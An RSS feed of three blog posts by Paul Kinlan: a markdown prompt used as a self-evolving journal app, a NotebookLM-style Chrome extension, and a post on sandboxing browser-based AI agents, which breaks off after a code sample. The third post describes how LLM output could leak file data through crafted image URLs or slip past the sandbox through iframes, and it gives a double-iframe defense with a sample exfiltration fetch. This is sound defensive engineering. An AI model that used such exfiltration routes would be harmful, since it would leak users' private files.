<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>AI Focus</title><link>https://aifoc.us/</link><description>Recent content on AI Focus</description><generator>Hugo -- gohugo.io</generator><language>en-us</language><managingEditor>paul@aifoc.us (Paul Kinlan)</managingEditor><webMaster>paul@aifoc.us (Paul Kinlan)</webMaster><lastBuildDate>Sat, 21 Feb 2026 19:15:00 +0000</lastBuildDate><atom:link href="https://aifoc.us/index.xml" rel="self" type="application/rss+xml"/><item><title>the prompt is the program</title><link>https://aifoc.us/prompt-is-the-program/</link><pubDate>Sat, 21 Feb 2026 19:15:00 +0000</pubDate><author>paul@aifoc.us (Paul Kinlan)</author><guid>https://aifoc.us/prompt-is-the-program/</guid><description>&lt;p>I built an application recently. It has a contact directory, a database, cross-referencing, topic tracking, meeting notes, project management, backup and restore, automated sync, conflict resolution, and a task queue. The entire program is a markdown file.&lt;/p>
&lt;p>It&amp;rsquo;s just a &lt;a href="https://github.com/PaulKinlan/journal/blob/main/CLAUDE.md">&lt;code>CLAUDE.md&lt;/code>&lt;/a> file. It sits in a git repo with some bash scripts for plumbing, but the actual behaviour (what the system does, how it organises data, when it evolves) lives in natural language instructions. The prompt is the program.&lt;/p></description><content:encoded><![CDATA[<p>I built an application recently. It has a contact directory, a database, cross-referencing, topic tracking, meeting notes, project management, backup and restore, automated sync, conflict resolution, and a task queue. The entire program is a markdown file.</p>
<p>It&rsquo;s just a <a href="https://github.com/PaulKinlan/journal/blob/main/CLAUDE.md"><code>CLAUDE.md</code></a> file. It sits in a git repo with some bash scripts for plumbing, but the actual behaviour (what the system does, how it organises data, when it evolves) lives in natural language instructions. The prompt is the program.</p>
<p>This started from a gap in my own workflow. I used <a href="https://logseq.com/">Logseq</a> every day for a long time and it worked well: markdown, daily logs, cross-references. Then I went on holiday for a couple of weeks, stopped, and never got back into it. The problem was never the app. It was the operating model. I needed memory I controlled, that worked within enterprise constraints, and that didn&rsquo;t lock context inside a platform.</p>
<p>As I spent more time with large language models, I kept coming back to a few things.</p>
<p>First, memory. Why is it treated as a feature when it should be the base state? And where should it live if I&rsquo;m serious about keeping it mine? Most chat systems still feel built for isolated conversations. If one thread remembers the previous one, that can be a bonus, but it can also be incredibly creepy because it&rsquo;s not always expected. But some systems, you expect memory to be the baseline, and that&rsquo;s what I wanted to explore, within the constraints of it being local, private, and mine.</p>
<p>But there was something else. I was using LLMs to build applications, libraries, tools, services (I even <a href="/super-apps">replaced most of my apps with an LLM on a trip to Japan</a>), and I noticed that sometimes a model would create a small, complete program from a single instruction to solve a very specific task. No scaffolding, no framework, just an instruction and a working result. That got me wondering: how far could you push this? Could you build systems that are emergent, where the application grows and restructures itself as the conversation continues?</p>
<p>So I wrote a behaviour contract in markdown and pointed an LLM at it.</p>
<p>The common objection is fair: prompts are too loose to count as programs. But I&rsquo;ve started to find that high-level instructions are enough, and often better.
Here&rsquo;s what my <a href="https://github.com/PaulKinlan/journal/blob/main/CLAUDE.md"><code>CLAUDE.md</code></a> actually specifies:</p>
<ul>
<li><strong>Data model:</strong> daily entries in <code>entries/</code>, people and topics indexed separately, TODOs as first-class objects, ideas and projects explicit, meetings with dedicated structure. All plain-text markdown.</li>
<li><strong>Behaviour on input:</strong> when the user journals something, create the daily entry, create or update any referenced topic/person/idea/TODO files, cross-link everything, update the living index. Every action produces structured state.</li>
<li><strong>Boundaries:</strong> personal data stays in specific folders, excluded from the public repo by policy. Private data is marked as such. The system knows what not to share.</li>
<li><strong>Evolution:</strong> the system is expected to change. The prompt tells the agent to propose new folder types when it notices recurring patterns, update its own conventions, and log structural changes.</li>
</ul>
<p>The last point kinda blew my mind. The prompt tells the agent to modify itself.</p>
<p>Within a week of use, the system proposed a <code>meetings/</code> folder because I kept logging meetings inline. It proposed a <code>projects/</code> folder to separate active codebases from broader topics. And when I noticed I couldn&rsquo;t easily see which TODOs were still active, I asked the model how we might solve it. It proposed a <code>todos/done/</code> subfolder to archive completed items without losing history. Each time, it updated its own instructions to include the new convention.</p>
<p>The program can rewrite its own source code. Early on it happened a lot as the system found its shape. Now it happens less and less, which I think is actually a good sign. The structure has settled into something that works for me and my workflow.</p>
<p>That is weird, and a little bit scary, and also genuinely useful.</p>
<p>A concrete example: we were renovating a house and picking paint colours online. I told the journal to remember the URL, extract the colour codes, and remind me to get samples the next day. I asked a journal to do work for me on data I&rsquo;d just given it. That in itself is kind of crazy.</p>
<p>The next day, the reminder was there. I went to the store. The store wanted <a href="https://en.wikipedia.org/wiki/RAL_colour_standard">RAL codes</a>, a standard colour format used across the paint industry, and couldn&rsquo;t use what I had from the website. I had no clue what a RAL code was and no clue how to convert it. There were <a href="https://rgb.to/ral">tools</a> <a href="https://hextoral.com/">online</a> that could do it, but I didn&rsquo;t have time. So I just asked the journal to continue the task: find the equivalent local format and convert the values.</p>
<p>By the time I got home, the conversion was done:</p>
<pre tabindex="0"><code>| Original Colour | Brand Code | Valspar Equivalent | Valspar Code |
| --------------- | ---------- | ------------------ | ------------ |
| Manchester Tan  | BM HC-81   | Rattan Basket      | 3007-10C     |
| Bleeker Beige   | BM HC-80   | Ancient Relic      | M302         |
| Shaker Beige    | BM HC-45   | Garden Rain        | V094-2       |
| Grant Beige     | BM HC-83   | Vanderbilt Beach   | V134-1       |
| Canvas Tan      | SW 7531    | Vanderbilt Beach   | V134-1       |
....
Shortened
....
| Kilim Beige     | SW 6106    | *(give SW code to mixer)* | N/A   |
| Wool Skein      | SW 6148    | *(give SW code to mixer)* | N/A   |

BM is Benjamin Moore, SW is Sherwin-Williams.
Nearby RAL matches (not exact): RAL 1013, 1014, 1015, 7032 [ shortened ......]
</code></pre><p>I went back to the store the following day. I learned a lot more about what RAL codes actually are and how they don&rsquo;t cleanly map to the colours we&rsquo;d picked from the website. But the ones the system suggested were, when I checked them physically, close enough to what we needed as inspiration.</p>
<p>The journal wasn&rsquo;t storing context. It was solving the next step in a chain of work, <a href="/ai-powered-site-mashups">mashing up data across sources</a> like an agent would. The prompt defined a system that could pick up a task, carry it across sessions, and act on it. Not because I wrote task-management code, but because the instructions said to.</p>
<p>The latest evolution: the system now suggests work it can do on its own. I have a backlog of article ideas, research tasks, and project seeds captured in the journal. The prompt instructs the agent to review these at the start of each session and suggest things it could research in the background. Gather data, find prior art, identify logical gaps, surface follow-on questions.</p>
<p>I didn&rsquo;t write a task scheduler. I wrote a sentence that said &ldquo;review ideas and suggest things you could work on.&rdquo; And it does.</p>
<p>The same set of instructions works reasonably well across Claude Code, Codex, and Gemini CLI. It&rsquo;s not perfect, but I can use them more or less interchangeably. That&rsquo;s surprising. These LLM CLIs are a new kind of runtime, and the fact that a markdown file can act as a program across all of them opens up a way of building software that I hadn&rsquo;t really thought about before.</p>
<p>I&rsquo;m not rejecting existing tools. Logseq is excellent. My friend <a href="https://robdodson.me/">Rob Dodson</a> is doing great work at the intersection of second brain thinking and large language models. His piece on <a href="https://robdodson.me/posts/i-gave-my-second-brain-a-gardener/">giving his second brain a gardener</a>, his writing on <a href="https://robdodson.me/posts/how-i-built-my-mobile-second-brain/">building a mobile second brain</a>, and his thoughts on <a href="https://robdodson.me/posts/your-ai-chatbot-is-a-gatekeeper/">why AI chatbots become gatekeepers</a> are all worth reading, and at the same time, I now have a tool that works well enough for me.</p>
<p>And I&rsquo;ll be honest: there&rsquo;s a good chance I fall away from this model eventually. It would be a stretch to pretend this has permanently replaced everything.</p>
<p>But the thing that keeps it alive is not a feature. It&rsquo;s the self-organising behaviour. I can type or dictate, and the system turns that into state: reminders, links, TODOs, references, context for next week. The structure emerged from use, not from upfront design.</p>
<p>Most people still design from the UI outward. I started with a minimal behaviour contract and let the structure emerge from what I was actually doing day to day with the system.</p>
<p>What surprised me is how little code I had to write. The bash scripts handle plumbing: backup, restore, merge, sync. And honestly, if I&rsquo;d encoded that in the prompt too, the model could probably manage it. I just didn&rsquo;t have the confidence to do that at the start. The actual program, the part that decides what to do with my input and how I organise my life, is prose.</p>
<p>I&rsquo;d really encourage people to explore this. In the last six months or so, something has shifted. Models have become dramatically better at tool calling. The concept of <a href="https://sketch.dev/blog/agent-loop">agentic loops</a> has developed far enough that you can keep these systems on rails, at least for simple enough use cases. We&rsquo;ve hit a point we&rsquo;ve never been at before: you can build a real, useful system by having a conversation with an LLM and writing down the instructions for how it should behave. No framework, no app store, no deployment pipeline. Just prose, an LLM as a runtime, and a loop. I can imagine more and more people starting to think about building programs, automations, and personal systems this way.</p>
]]></content:encoded></item><item><title>If NotebookLM was a web browser</title><link>https://aifoc.us/if-notebooklm-was-a-web-browser/</link><pubDate>Sun, 25 Jan 2026 18:00:00 +0000</pubDate><author>paul@aifoc.us (Paul Kinlan)</author><guid>https://aifoc.us/if-notebooklm-was-a-web-browser/</guid><description>&lt;p>&lt;a href="https://notebooklm.google.com/">NotebookLM&lt;/a> is one of my favorite applications in decades. If you haven&amp;rsquo;t experienced it before, it&amp;rsquo;s an application that lets you pull in sources from all around - Google Drive, PDFs, public links - collate them into a notebook, and then query or transform that content. Want to turn five research papers into a podcast? Done. Need to extract key takeaways from a collection of articles? Easy. It&amp;rsquo;s a fundamentally different way of interacting with information that wasn&amp;rsquo;t possible before large language models.&lt;/p></description><content:encoded><![CDATA[<p><a href="https://notebooklm.google.com/">NotebookLM</a> is one of my favorite applications in decades. If you haven&rsquo;t experienced it before, it&rsquo;s an application that lets you pull in sources from all around - Google Drive, PDFs, public links - collate them into a notebook, and then query or transform that content. Want to turn five research papers into a podcast? Done. Need to extract key takeaways from a collection of articles? Easy. It&rsquo;s a fundamentally different way of interacting with information that wasn&rsquo;t possible before large language models.</p>
<p>But there&rsquo;s something that has been nagging at me. The browser already <em>is</em> a collection of sources. Tabs, bookmarks, history, tab groups, links in the page - these are all repositories of content that I&rsquo;ve deemed interesting enough to keep around or could be interesting enough to explore. Yet the ability to manipulate what&rsquo;s across those sources isn&rsquo;t something we&rsquo;ve spent much time thinking about, our traditgional model of browsing is still very much &ldquo;one page at a time.&rdquo;</p>
<p>What would happen if NotebookLM was actually a web browser?</p>
<p>One of the things I love about browsers and the web is that the browser is <em>my user agent</em> for <em>my</em> viewing the entirety of the web. It has full access to the content I consume. Chrome extensions can come in and augment pages, provide extra functionality the original author didn&rsquo;t plan for. The <a href="/elements/">pliability of hypertext</a>, that is: HTML, CSS, and JavaScript, means we can reshape content to suit our own personal needs. I&rsquo;ve been <a href="/hypermedia/">thinking a lot about hypermedia</a> and the original visions from pioneers like Vannevar Bush and Ted Nelson, where users would create their own links and <a href="https://chromewebstore.google.com/detail/trails/cmhofadlaokelmccnocbnojdbdnfjhga">trails</a> through information. The web gave us the <code>&lt;a&gt;</code> tag, but <a href="/a-link-is-all-you-need/">the link</a> as we know it is still fundamentally author-controlled and static. We haven&rsquo;t really taken this to its logical conclusion. If I have fifteen tabs open about the same topic, why can&rsquo;t I query across all of them? If I&rsquo;ve bookmarked a collection of articles over the past year, why can&rsquo;t I transform them into a study guide? The data is right there, inside my browser.</p>
<p>So I started to explore this in an experiment that I call <a href="https://github.com/PaulKinlan/NotebookLM-Chrome">FolioLM</a>. Consider a scenario: I find an interesting thread on Techmeme with fifteen different news sources covering the same story. Today, I&rsquo;d have to open each one, read through them, and manually synthesize. With FolioLM, I can select all those links, add them to a folio, and ask &ldquo;What are the key differences in how each outlet is covering this story?&rdquo; Or transform them into a comparison table. Or a timeline of how the story evolved. This isn&rsquo;t just convenience. It&rsquo;s a fundamentally different relationship with information. The browser becomes less of a window and more of a workshop.</p>
<p>Here&rsquo;s something that differentiates FolioLM from NotebookLM and similar tools: it runs inside your browser, which means it has access to everything <em>you</em> have access to. That paywall-protected article from the Financial Times? If you&rsquo;re logged in, FolioLM can extract it. That internal wiki behind your corporate firewall? Accessible. That research paper you can only read because your university has a subscription? It&rsquo;s right there.</p>
<p>External tools can only see what&rsquo;s publicly available on the open web. But the browser is your authenticated view of the internet. It carries your cookies, your sessions, your credentials. When you extend the browser with something like a Chrome extension, that extension inherits that same authenticated context. The content that matters most to me - the stuff I&rsquo;m paying for, the stuff behind logins, the internal documentation - is exactly the content I most want to query and transform. And because FolioLM operates within the browser, it can.</p>
<p>FolioLM is a Chrome extension that tries to bring NotebookLM-style capabilities directly into the browser. You can add sources from anywhere the browser can see: the current tab with one click, multiple selected tabs at once, all tabs in a tab group, bookmarks, browser history, right-click any link or image, drag and drop links from web pages, or create your own text notes.</p>
<figure><img src="/images/foliolm-source-collection.png"
    alt="FolioLM source collection interface"><figcaption>
      <p>Adding sources from tabs, bookmarks, and history</p>
    </figcaption>
</figure>

<p>When you add a source, FolioLM extracts the content and converts it to clean markdown using <a href="https://github.com/mixmark-io/turndown">Turndown</a>, filtering out navigation, ads, and boilerplate. You can then query across all your sources with natural language, getting answers with citations back to the original sources. Clicking a citation opens the source URL with text fragment highlighting, so you can see exactly where the information came from.</p>
<figure><img src="/images/foliolm-chat.png"
    alt="FolioLM chat interface with citations"><figcaption>
      <p>Querying sources with AI-powered chat and inline citations</p>
    </figcaption>
</figure>

<p>The transformations are where it gets interesting. I&rsquo;ve been <a href="/hyper-content-negotiation/">exploring hyper-content-negotiation</a> and the idea that content on the web could be served in whatever format the user wants. FolioLM takes this a step further by letting you transform content you&rsquo;ve already collected. It can transform your sources into 19 different formats: quizzes, flashcards, study guides, podcast scripts, email summaries, slide decks, reports, timelines, comparisons, data tables, mind maps, glossaries, FAQs, outlines, citations, action items, executive briefs, key takeaways, and pros/cons analyses. Each is configurable - you can adjust the number of quiz questions, the tone of the podcast, the depth of the report. The results can be saved, opened in full-screen, or copied to your clipboard.</p>
<figure><img src="/images/foliolm-slide-deck.png"
    alt="FolioLM slide deck transformation"><figcaption>
      <p>Transforming sources into a slide deck presentation</p>
    </figcaption>
</figure>

<figure><img src="/images/foliolm-timeline.png"
    alt="FolioLM timeline transformation"><figcaption>
      <p>Generating a timeline from collected sources</p>
    </figcaption>
</figure>

<figure><img src="/images/foliolm-study-guide.png"
    alt="FolioLM study guide transformation"><figcaption>
      <p>Creating an interactive study guide</p>
    </figcaption>
</figure>

<p>On the technical side, it&rsquo;s a Manifest V3 Chrome extension built with TypeScript, Preact, and the Vercel AI SDK. It supports 16+ AI providers including Anthropic, OpenAI, Google Gemini, Groq, Mistral, and Chrome&rsquo;s built-in Gemini Nano (which works offline and costs nothing although can&rsquo;t process anywhere near as much data). Transformations run in the service worker, which means they continue even if you close the side panel.</p>
<p>I grew up with the Web and it&rsquo;s incredibly important to me, specifically the link. I tied to build this tool to enhance my relationship with web content, not replace it. Every source keeps its original URL with an external link icon that opens the original page in a new tab. When the AI cites a source, those citations are clickable (they open the source URL with <a href="https://developer.chrome.com/docs/web-platform/text-fragments">text fragment highlighting</a>), so you land directly on the relevant passage (there are bugs, sometimes it doesn&rsquo;t quite work).</p>
<p>The extension also extracts links from the content itself. When you add an article, FolioLM captures all the outbound links along with their anchor text and surrounding context. These get analyzed by AI and surfaced as &ldquo;Suggested Links&rdquo; which are related sources you might want to add to your notebook. It&rsquo;s important to me to encourage myself (and anyone who uses the tool) to explore more of the web, not less. Source types are visually distinguished with icons so you always know where content came from. Nothing is locked inside the extension; every piece of information has a path back to where it came from.</p>
<p>This matters because it would be easy to build a tool that just ingests content and presents it in a closed environment. But that&rsquo;s not the web to me, it&rsquo;s useful, but exploring the web is what I love.</p>
<p>There&rsquo;s a pattern I keep coming back to: the browser knows things about my browsing that I don&rsquo;t fully leverage. It knows what tabs I have open, what I&rsquo;ve bookmarked, my history. But these remain largely isolated data stores. When I think about the intersection of AI and the browser, I see an opportunity to make the browser a more intelligent user agent that is active in how I consume and synthesize information.</p>
<p>This connects to a broader question I&rsquo;ve been wrestling with. In <a href="/super-apps/">super-apps</a> I wrote about how LLMs like Gemini and ChatGPT become the everything-app then you will rarely need to leave them. If that&rsquo;s where things are heading, what happens to the web? In <a href="/interception/">interception</a> I experimented with having LLMs intercept and transform every web request. In <a href="/embedding/">embedding</a> I explored how the web needs better primitives for composability if it&rsquo;s going to remain relevant.</p>
<p>There&rsquo;s a tension here that I&rsquo;ve been thinking about for a long time. When we were launching the first version of the Chrome Web Store in the early 2010s, I worked with magazine and digital publishers to bring rich, high-quality content experiences to the web. Many of these publishers had been successful on the iPad, and we wanted that same quality on the web. But we kept hitting the same wall: nearly every publisher wanted their layout, their text, their images to render exactly as the editor intended. Pixel-perfect. And we&rsquo;d have to explain that the web doesn&rsquo;t really work that way. You can resize the browser. You can zoom. The content reflows. People can change the page with Chrome Extensions and Grease Monkey scripts. The publishers hated it. They&rsquo;d been promised by that the iPad would maintain the exact vision of the editor, and they wanted that same guarantee on the web.</p>
<p>That disconnect has stuck with me. I think many publishers still want complete control of their experience. And as users, we want to be able to transform those experiences to make them more useful for us. Chrome Extensions already cause tension when they manipulate sites on the user&rsquo;s behalf. I&rsquo;m honestly not sure whether some of my more aggressive experiments - like <a href="/interception/">interception</a> where LLMs rewrite entire pages - will ever be broadly acceptable.</p>
<p>Which brings me back to why FolioLM takes the approach it does. It&rsquo;s not rewriting pages or intercepting content. It&rsquo;s a companion (a <a href="/the-browser-is-the-sandbox/">coworker</a> if you will, heh!) for information management that generates complementary experiences personalized for you, leaving the original content intact. I&rsquo;m not trying to replace the browser or become a closed super-app, I&rsquo;m trying to make the browser itself more capable and to give myself tools to work <em>with</em> web content. The web has always been about connecting documents with links being the fundamental unit of the web&rsquo;s structure. But we&rsquo;ve mostly treated that structure as something staticm, that is you follow a link, you read a document, you maybe link to it in your own writing. What if the browser could help you see patterns across documents? Synthesize information? Transform it into new forms? I&rsquo;d personally flippin&rsquo; love that.</p>
<p>That&rsquo;s the question I&rsquo;m exploring with this site, FolioLM, and <a href="/projects/">many other experiments</a>. I built almost all of FolioLM with coding LLMs and my voice. Very little handwritten code. This is the intersection I find most exciting right now: LLMs can help you synthesize information across browser tabs in ways we&rsquo;ve never been able to do before, <em>and</em> LLMs can help you build the tools to do that synthesis in the first place. We&rsquo;re getting closer to a point where you don&rsquo;t need a team or a company to build something like NotebookLM. If you want an information management tool that works the way <em>you</em> work, you can build it. FolioLM is my tool, built for me, that works the way I want it to work. It doesn&rsquo;t need to be a polished product with onboarding flows and pricing tiers. It just needs to solve my problem. And if it solves yours too, great. If not, maybe you build your own.</p>
<p>The browser is the runtime. The web is the data source. LLMs are both the capability layer and the means of construction.</p>
<hr>
<p>If you want to try it out or fork it for your own purposes, FolioLM is <a href="https://github.com/PaulKinlan/NotebookLM-Chrome">available on GitHub</a>. Also, a big thanks to <a href="https://scholar.google.com/citations?user=gVj8N7MAAAAJ&amp;hl=en">Joseph Mearman</a> who loved the idea of this and hopped in and also started adding to it :D</p>
]]></content:encoded></item><item><title>the browser is the sandbox</title><link>https://aifoc.us/the-browser-is-the-sandbox/</link><pubDate>Sun, 25 Jan 2026 00:30:00 +0000</pubDate><author>paul@aifoc.us (Paul Kinlan)</author><guid>https://aifoc.us/the-browser-is-the-sandbox/</guid><description>&lt;p>I got hooked on Claude Code over the holiday break and used it to create a number of small projects in record time. The CLI works well, and &lt;a href="https://claude.ai/code">claude.ai/code&lt;/a> has a really nice way of just firing off tasks and then reviewing them when done. The model has enabled me to create and ship a lot of personal projects that I&amp;rsquo;ve always wanted to build (I will talk about my process in a later post, as I think software development is changing very quickly with CLIs like Gemini and Claude). For example, I created a Chrome Extension that works like NotebookLM but uses your active Tab as the source material, and another that transcribes and transforms my voice to insert directly into text boxes. This efficiency allowed me to rip through a backlog of ideas.&lt;/p></description><content:encoded><![CDATA[<p>I got hooked on Claude Code over the holiday break and used it to create a number of small projects in record time. The CLI works well, and <a href="https://claude.ai/code">claude.ai/code</a> has a really nice way of just firing off tasks and then reviewing them when done. The model has enabled me to create and ship a lot of personal projects that I&rsquo;ve always wanted to build (I will talk about my process in a later post, as I think software development is changing very quickly with CLIs like Gemini and Claude). For example, I created a Chrome Extension that works like NotebookLM but uses your active Tab as the source material, and another that transcribes and transforms my voice to insert directly into text boxes. This efficiency allowed me to rip through a backlog of ideas.</p>
<p>I then saw Claude Cowork and thought that if it makes it easier for people to perform tasks that work across some of the files on your device, then it could be a pretty compelling view of the future of automation for non-coding computing tasks. One of the worries that people rightly have is giving unfettered access to a tool that you don&rsquo;t know how it works and can perform destructive actions on your data. My use of agentic loops (CLIs in particular) has always worried me a little, as I tend to be a bit risky and run tasks without constraining the tool&rsquo;s access to my file system. While I feel in control because I monitor the interactions, I know I&rsquo;m taking a risk. If these new agentic-use patterns are found to be valuable by regular people, we have to ensure that tools can&rsquo;t run riot on a user&rsquo;s machine, either by accessing things they shouldn&rsquo;t or modifying things without permission.</p>
<p>I read a post by <a href="https://gist.github.com/simonw/35732f187edbe4fbd0bf976d013f22c8">Simon Willison that described how Anthropic implemented this</a> using their <a href="https://github.com/anthropic-experimental/sandbox-runtime">sandbox experiment</a> to create a sandboxed VM that is locked down to only the directory that the user selected with limited network access.</p>
<p>This got me thinking about the browser. Over the last 30 years, we have built a sandbox specifically designed to run incredibly hostile, untrusted code from anywhere on the web, the instant a user taps a URL. I think it&rsquo;s incredible that we have this way to run code that you&rsquo;ve no clue what it will do when you see a little blue link or a piece of text that looks like <code>https://paul.kinlan.me/</code> - I mean, who would trust that guy?</p>
<p>Could you build something like Cowork in the browser? Maybe. To find out, I built a demo called <a href="http://co-do.xyz">Co-do</a> that tests this hypothesis. In this post I want to discuss the research I&rsquo;ve done to see how far we can get, and determine if the browser&rsquo;s ability to run untrusted code is useful (and good enough) for enabling software to do more for us directly on our computer.</p>
<h2 id="the-sandboxing-framework">The sandboxing framework</h2>
<p>I liked Anthropic&rsquo;s README for the sandbox experiment and it&rsquo;s a good place to start:</p>
<blockquote>
<p>Both filesystem and network isolation are required for effective sandboxing. Without file isolation, a compromised process could exfiltrate SSH keys or other sensitive files. Without network isolation, a process could escape the sandbox and gain unrestricted network access.</p></blockquote>
<p>We have some ability to control these inside the browser. I can see at least three areas of sandboxing that we need to examine:</p>
<ol>
<li><strong>The file system</strong> - you don&rsquo;t want an autonomous system to be able to change files without permission, or reach out past where the user has given access. You also probably want some sort of backup.</li>
<li><strong>The network</strong> - you don&rsquo;t want the system making requests to sites and services with your data (either generated data or actual file system data). There are plenty of ways to exfiltrate data.</li>
<li><strong>The execution environment</strong> - you are running code that someone somewhere has created (similar to <code>sandbox-exec</code> on macOS).</li>
</ol>
<p>Let&rsquo;s examine each of these.</p>
<h2 id="the-file-system">The file system</h2>
<p>I think the browser has built up a good model of protecting the user&rsquo;s file system from unwanted access while also giving people control. We can access the filesystem through a number of different layers:</p>
<ul>
<li><strong>Layer 1: Read-only access</strong> - <code>&lt;input type=&quot;file&quot; webkitdirectory&gt;</code> will let the user select a folder and you can then read the files that are in those folders.</li>
<li><strong>Layer 2: Origin-private filesystem</strong> - while not directly giving access to the raw filesystem, you get the ability to have a <a href="https://developer.mozilla.org/en-US/docs/Web/API/File_System_API/Origin_private_file_system">filesystem directly in the browser only accessible to the current origin</a>.</li>
<li><strong>Layer 3: Full access to a folder</strong> - Building on top of Layer 1, you can get a handle directly to the user-selected folder via the <a href="https://developer.chrome.com/docs/capabilities/web-apis/file-system-access">File System Access API</a>. With permission, you can both read and write to it, but you can&rsquo;t access any level higher in the directory tree or look at sibling directories. Effectively, you have a <code>chroot</code>-like environment restricted to that specific handle.</li>
</ul>
<p>I think this is pretty compelling. You could imagine a Layer 1 and Layer 2 solution working together: a web application could read the data the user has granted access to and then save some edits to a file on the Origin, keeping the original file intact and letting you continue edits.</p>
<p>Layer 3 is where it gets interesting (and scary). Being able to edit files enables so many new use-cases and possibilities for automation and knowledge-work, but we have to put complete trust in the browser&rsquo;s runtime to ensure that sites can&rsquo;t break out of this filesystem jail.</p>
<p>One area that demands caution: running code or HTML from an untrusted source, like an LLM, could extract content from the page to exfiltrate elsewhere, edit or delete critical content you&rsquo;ve granted access to, or create malicious files intended to run later (e.g., adding a .doc file with a macro).</p>
<h2 id="the-network">The network</h2>
<p>So if we are able to access selected directories and all the files within them on a user&rsquo;s machine, how do we ensure that the data remains within our control? We have to be able to completely control the network.</p>
<p>The blunt answer is that unless you have an entirely client-side LLM, you can&rsquo;t. You have to send the data in your files, or a list of your files, at some point for the LLM to do work on them. The best that I think we can do is &ldquo;manage the network&rdquo;.</p>
<p>Normally, Content Security Policy (CSP) is the bane of a web developer&rsquo;s life, but here it is our friend. Unlike a VM, which can strictly control the network interface of the host OS, the browser doesn&rsquo;t offer that level of total isolation. But via CSP, we do have some control.</p>
<p>Why is this important? There are lots of ways to craft URLs such that you can pass data that the user thought was private into another system without any intervention from the user. For example, displaying an image in the browser is an expected thing on the web. You could ask an LLM to generate an <code>&lt;img&gt;</code> whose URL contains some sensitive data from the file, which will then happily be sent to the server &ldquo;hosting the image&rdquo;.</p>
<p>CSP can protect us somewhat. We can set a pretty strict CSP constraint on the origin so that the only network requests that can be made are to <code>self</code> and to a set of developer-configured origins (such as an LLM provider). This means that the host page can also set constraints to stop image, media, object, and font loading. However, manually configuring these can be error-prone, so it is safer to start with the most restrictive policy (<code>default-src 'none'</code>) and then selectively open up access to the specific services you require. But even then, we are putting our trust that the LLM provider doesn&rsquo;t provide open access to other GET requests.</p>
<h3 id="sandboxing-llm-output">Sandboxing LLM output</h3>
<p>If we display any content from the LLM, we should also heavily sanitise the data. Actually, we should probably completely sandbox it. <code>&lt;iframe&gt;</code>s are a great way to separate content as they can create a layer of indirection from the host and things we want embedded; however, as we will discover, they need some improving to be valuable for our sandboxing needs.</p>
<p>A game-changing feature is the <code>sandbox</code> attribute on the <code>&lt;iframe&gt;</code>. It allows us to further isolate generated content from the main page by placing the frame into a &rsquo;locked-down&rsquo; mode where it can do almost nothing. It can&rsquo;t run JS, it can&rsquo;t navigate, etc., unless the host page allows it. This restrict-then-include model stands in contrast to the <code>allow</code> attribute (Permissions Policy), which controls access to advanced APIs. For example, your allow attribute might become: <code>allow=&quot;camera 'none'; microphone 'none'; geolocation 'none'; fullscreen 'none'; display-capture 'none'; payment 'none'; autoplay 'none'&quot;</code></p>
<p>This looks like a good model: we can restrict the ability to run dangerous JS and further remove access to powerful APIs. But if an LLM can be coerced to generate an iframe element, then it might be possible to escape the sandbox because, surprisingly, the host page&rsquo;s CSP doesn&rsquo;t filter into the iframe unless you use <code>srcDoc</code> or a <code>blob:</code> URL.</p>
<p>If you are in a Blink-based browser, you do have the ability to set the <code>csp</code> attribute and control what the embedded content can do on the network. It&rsquo;s odd that this isn&rsquo;t available on Gecko or WebKit-based browsers, as it seems like a very useful attribute to allow the host to have fine-grained control over what requests are allowed from the embedded frame.</p>
<p>If you want to run untrusted JS, you need to at least wrap the iframe in another iframe and process all the text to ensure that there are no other <code>&lt;iframe&gt;</code> elements in the input, and you have to ensure that they are on different origins (so don&rsquo;t include <code>sandbox='allow-same-origin'</code>).</p>
<h3 id="the-double-iframe-technique">The double iframe technique</h3>
<p>There is a way to manage and control this, but I&rsquo;ve not seen a huge amount of discussion about it online: the double iframe. This is a method used by a number of large-scale embedders (I believe Google Ads and OpenAI use it). The general concept is that you have an inner and an outer frame.</p>
<p>The outer iframe embeds a resource you control (often via srcdoc) and sets a restrictive policy on all network requests, acting as a policy firewall for the inner content:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-html" data-lang="html"><span style="display:flex;"><span><span style="color:#75715e">&lt;!-- Do not use this - You should sanitise srcdoc and likely set it via JS vs rendered from Server --&gt;</span>
</span></span><span style="display:flex;"><span>&lt;<span style="color:#f92672">iframe</span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">id</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;jail&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">sandbox</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;allow-scripts&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">srcdoc</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    &lt;!-- OUTER FRAME: Defines the &#39;No Network&#39; Policy --&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    &lt;meta http-equiv=&#39;Content-Security-Policy&#39; content=&#39;default-src &amp;quot;none&amp;quot;; script-src &amp;quot;unsafe-inline&amp;quot;; style-src &amp;quot;unsafe-inline&amp;quot;&#39;&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    &lt;!-- INNER FRAME: Holds the content --&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    &lt;iframe sandbox=&#39;&#39; srcdoc=&#39;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        &lt;h1&gt;LLM Generated Content&lt;/h1&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        &lt;script&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            // This fetch will fail immediately due to default-src &#39;none&#39;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            fetch(&#39;https://evil.com&#39;);
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        &lt;/script&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        &lt;img src=&#39;https://aifoc.us/someurlswithsecretdata&#39;&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    &#39;&gt;&lt;/iframe&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>&gt;&lt;/<span style="color:#f92672">iframe</span>&gt;
